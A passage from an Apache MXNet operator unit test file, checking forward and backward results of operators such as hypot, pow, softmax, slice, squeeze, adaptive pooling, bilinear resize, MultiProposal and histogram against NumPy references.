num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@with_seed()
def test_softmax():
check_softmax_with_shape((3, 4), default_context(), preserve_shape=False)
check_softmax_with_shape((3, 4), default_context(), preserve_shape=True)
check_softmax_with_shape((3, 4, 2), default_context(), preserve_shape=True)
check_softmax_grad(default_context())
check_smoothed_softmax_grad(default_context())
@with_seed()
def test_softmax_output_normalization():
def _softmaxoutput_normalization(multi_output, use_ignore, normalization):
grad_scale = np.random.random()
batch_size = 8
num_labels = 6
H, W = 3, 3
ignore_label = np.random.randint(0, num_labels) if use_ignore else -1
if multi_output:
data_shape = (batch_size, num_labels, H, W)
label_shape = (batch_size, H, W)
else:
data_shape = (batch_size, num_labels)
label_shape = (batch_size, )
data = mx.nd.random.uniform(-1, 1, shape=data_shape)
label = mx.nd.random.randint(
0, num_labels, shape=label_shape).astype('float32')
data.attach_grad()
kwargs = dict(grad_scale=grad_scale,
normalization=normalization, multi_output=multi_output)
if use_ignore:
kwargs.update(use_ignore=True, ignore_label=ignore_label)
with mx.autograd.record():
out = mx.nd.SoftmaxOutput(data=data, label=label, **kwargs)
out.backward(mx.nd.ones_like(data))
exp_data = mx.nd.exp(data)
softmax_data = exp_data / exp_data.sum(1, keepdims=True)
argmax_data = mx.nd.argmax(data, axis=1)
assert_almost_equal(out.asnumpy(), softmax_data.asnumpy())
one_hot_label = mx.nd.one_hot(label, num_labels)
if multi_output:
one_hot_label = one_hot_label.transpose((0, 3, 1, 2))
data_grad = softmax_data - one_hot_label
if use_ignore:
if multi_output:
data_grad *= (label !=
ignore_label).reshape((batch_size, 1, H, W))
else:
data_grad *= (label != ignore_label).reshape((batch_size, 1))
valid_cnt = 1
if normalization == 'batch':
valid_cnt = batch_size
elif normalization == 'valid':
valid_cnt = mx.nd.maximum(1, (label != ignore_label).sum())
scale = grad_scale / valid_cnt
if multi_output:
if normalization != 'valid':
scale /= H * W
data_grad *= scale
assert_almost_equal(data.grad.asnumpy(), data_grad.asnumpy())
for multi_output in [False, True]:
for use_ignore in [False, True]:
for normalization in ['null', 'batch', 'valid']:
_softmaxoutput_normalization(
multi_output, use_ignore, normalization)
@with_seed()
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
def test_begin_equals_end(shape, begin, end, step):
in_arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
out_arr = mx.nd.slice(in_arr, begin=begin, end=end, step=step)
assertRaises(MXNetError, test_begin_equals_end, (4,), (2,), (2,), (1,))
assertRaises(MXNetError, test_begin_equals_end, (1, 5), (None, 3), (None, 3), (-1, 1))
assertRaises(MXNetError, test_begin_equals_end, (3, 4, 5), (1, 3, 1), (3, 3, 1), (1, -3, 2))
assertRaises(MXNetError, test_begin_equals_end, (2, 4), (None, 2), (None, 2), (1, -1))
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
@with_seed()
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@with_seed()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
assert_raises(MXNetError, min)
assert_raises(MXNetError, max)
@with_seed()
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@with_seed()
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
@with_seed()
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
date_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, date_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, date_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, date_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
@with_seed()
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output.asnumpy(),expected,
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected],
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected],
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
@with_seed()
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1.asnumpy(), np_bins1)
assert_almost_equal(mx_histo1.asnumpy(), np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2.asnumpy(), np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2.asnumpy(), np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1.bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2.bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
def test_op_output_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=False)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check output names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
# Windows doesn't support set environment variable on the fly, so disable it for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
def test_op_all_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=True)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check all names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
# Windows doesn't support set environment variable on the fly, so disable it for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['data', 'conv_data', 'conv_weight', 'conv_weight', 'conv_bias', 'conv_bias', 'conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['data', 'deconv_data', 'deconv_weight', 'deconv_weight', 'deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['data', 'fc_data', 'fc_weight', 'fc_weight', 'fc_bias', 'fc_bias', 'fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['data', 'lrn_data', 'lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['data', 'act_input0', 'act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['data', 'concat_arg0', 'data', 'concat_arg1', 'concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'softmax_output'])
length = mx.sym.Variable("length", shape=(10, 10, 10))
sm_sym = mx.sym.softmax(data, length, axis=1, use_length=True, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'length', 'softmax_length', 'softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['data', 'softmax_input0', 'softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['data', 'upsampling_arg0', 'upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['data', 'pooling_data', 'pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
